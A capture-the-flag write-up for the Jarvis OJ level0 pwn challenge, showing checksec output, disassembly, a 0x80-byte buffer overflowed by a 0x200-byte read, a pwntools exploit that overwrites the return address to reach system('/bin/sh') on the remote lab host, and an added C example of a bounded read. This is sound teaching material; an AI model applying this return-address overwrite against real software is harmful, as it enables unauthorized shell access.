Jarvis OJ [XMAN]level0

xiaoxiao2021-02-28  87

Check the binary's protections and the target platform

    liu@liu-F117-F:~/桌面/oj/level0$ checksec level0
    [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0'
        Arch:     amd64-64-little
        RELRO:    No RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)

NX is enabled and the binary is 64-bit; there is no stack canary and no PIE, so the text addresses are fixed.

    .text:0000000000400596 ; __unwind {
    .text:0000000000400596     push    rbp
    .text:0000000000400597     mov     rbp, rsp
    .text:000000000040059A     mov     edi, offset command ; "/bin/sh"
    .text:000000000040059F     call    _system
    .text:00000000004005A4     pop     rbp
    .text:00000000004005A5     retn
    .text:00000000004005A5 ; } // starts at 400596
    .text:00000000004005A5 callsystem endp
    .text:00000000004005A5

There is a function, callsystem at 0x400596, that calls system("/bin/sh").

    ssize_t vulnerable_function()
    {
        char buf; // [rsp+0h] [rbp-80h]   decompiler view: the buffer starts 0x80 bytes below rbp
        return read(0, &buf, 0x200uLL);   // accepts up to 0x200 bytes into that 0x80-byte region
    }

Stack overflow: buf occupies 0x80 bytes below rbp, but read() accepts up to 0x200 bytes, so the saved rbp and the return address can be overwritten.
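As an added illustration that is not part of the original writeup, the hardened counterpart of vulnerable_function(): the read length is derived from the buffer's own size instead of a larger constant. The function names, the unbounded_read_shape() mirror of the challenge code and the pipe-based demo_bounded_read() harness are assumptions made here for the example, not code from the challenge binary.

```c
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Same shape as the challenge's vulnerable_function(): a fixed 0x80-byte
 * buffer, but the read length comes from elsewhere (0x200 in the binary).
 * Anything past 0x80 bytes lands on the saved rbp (8 bytes) and then the
 * return address. Shown for contrast; the demo below never calls it. */
ssize_t unbounded_read_shape(int fd, size_t len) {
    char buf[0x80];
    return read(fd, buf, len);      /* len > sizeof buf: stack overflow */
}

/* Hardened form: the read length is tied to the buffer's capacity,
 * keeping one byte for a NUL terminator. */
ssize_t bounded_read(int fd, char *buf, size_t cap) {
    if (buf == NULL || cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0)
        return n;
    buf[n] = '\0';
    return n;
}

/* Demo harness (assumed, for illustration only): feed `input_len` bytes of
 * 'A' through a pipe (constructed input) and read them into a 0x80-byte
 * stack buffer with bounded_read(). Returns the number of bytes stored,
 * which is capped at 0x7f no matter how long the input is. */
ssize_t demo_bounded_read(size_t input_len) {
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    char *src = malloc(input_len ? input_len : 1);
    if (src == NULL)
        return -1;
    memset(src, 'A', input_len);
    ssize_t written = write(fds[1], src, input_len);
    free(src);
    close(fds[1]);                  /* EOF for the reader after the payload */
    if (written != (ssize_t)input_len) {
        close(fds[0]);
        return -1;
    }
    char buf[0x80];
    ssize_t n = bounded_read(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;
}
```

With a 0x200-byte input the hardened reader stores only 0x7f bytes, so nothing reaches the saved rbp or the return address.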

    from pwn import *

    s_addr = 0x0000000000400596            # callsystem: system("/bin/sh")
    p = remote("pwn2.jarvisoj.com", 9881)
    p.recvline()
    # 0x80 bytes fill buf, 8 more overwrite the saved rbp, then the return address
    p.sendline(b"A" * 0x80 + b"A" * 8 + p64(s_addr))
    p.interactive()

Difference from the 32-bit case: the saved rbp is 8 bytes, and the address is packed with p64().

Please credit the original URL when reposting: https://www.6miu.com/read-2631628.html
